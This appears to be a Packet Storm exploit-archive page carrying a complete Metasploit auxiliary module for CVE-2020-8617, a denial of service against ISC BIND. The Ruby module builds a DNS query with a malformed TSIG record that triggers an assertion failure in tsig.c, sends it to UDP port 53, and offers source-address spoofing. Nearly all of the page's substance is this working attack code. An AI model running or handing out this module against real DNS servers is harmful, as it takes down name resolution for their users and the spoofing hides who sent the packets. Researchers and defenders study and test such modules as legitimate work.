exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BIND TSIG Badtime Query Denial of Service

BIND TSIG Badtime Query Denial of Service
Posted Aug 31, 2024
Authored by Tobias Klein, Shuto Imai | Site metasploit.com

A logic error in code which checks TSIG validity can be used to trigger an assertion failure in tsig.c.

tags | exploit
advisories | CVE-2020-8617
SHA-256 | 147811b054c922122feaf56704105032929fea6ae4759c47e6c473671c684671

BIND TSIG Badtime Query Denial of Service

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::UDPScanner
include Msf::Auxiliary::Dos

def initialize(info = {})
super(
update_info(
info,
'Name' => 'BIND TSIG Badtime Query Denial of Service',
'Description' => %q{
A logic error in code which checks TSIG validity can be used to
trigger an assertion failure in tsig.c.
},
'Author' => [
'Tobias Klein', # Research and Original PoC
'Shuto Imai', # msf module author
],
'References' => [
['CVE', '2020-8617'],
['URL', 'https://gitlab.isc.org/isc-projects/bind9/-/issues/1703'],
['URL', 'https://www.trapkit.de/advisories/TKADV2020-002.txt']
],
'DisclosureDate' => '2020-05-19',
'License' => MSF_LICENSE,
'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'SideEffects' => [],
'Reliability' => []
}
)
)

register_options([
Opt::RPORT(53),
OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']),
])

deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
end

def scan_host(ip)
print_status("Sending packet to #{ip}")
if datastore['SRC_ADDR']
scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])
else
scanner_send(payload, ip, rport)
end
end

def payload
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65
query << "\x00\x00" # Flags: 0x0000 Standard query
query << "\x00\x01" # Questions: 1
query << "\x00\x00" # Answer RRs: 0
query << "\x00\x00" # Authority RRs: 0
query << "\x00\x01" # Additional RRs: 1

# Domain Name
query << get_domain # Random DNS Name
query << "\x00" # [End of name]
query << "\x00\x01" # Type: A (Host Address) (1)
query << "\x00\x01" # Class: IN (0x0001)

# Additional records. Name
query << "\x0alocal-ddns"
query << "\x00"

query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
query << "\x00\xff" # Class: ANY (0x00ff)
query << "\x00\x00\x00\x00" # Time to live: 0
query << "\x00\x1d" # Data length: 29

# Algorithm Name
query << "\x0bhmac-sha256" # The algorithm for local-ddns is hmac-sha256
query << "\x00"

# Rest of TSIG
query << "\x00\x00\x00\x00\x00\x00" # Time Signed: Jan 1, 1970 00:00:00.000000000 UTC
query << "\x00\x00" # Fudge: 0
query << "\x00\x00" # MAC Size: 0
query << "\x00\x00" # Original Id: 0
query << "\x00\x10" # Error: BadSig (16)
query << "\x00\x00" # Other len: 0
end

def get_domain
domain = "\x06#{Rex::Text.rand_text_alphanumeric(6)}"
org = "\x03#{Rex::Text.rand_text_alphanumeric(3)}"
domain + org
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close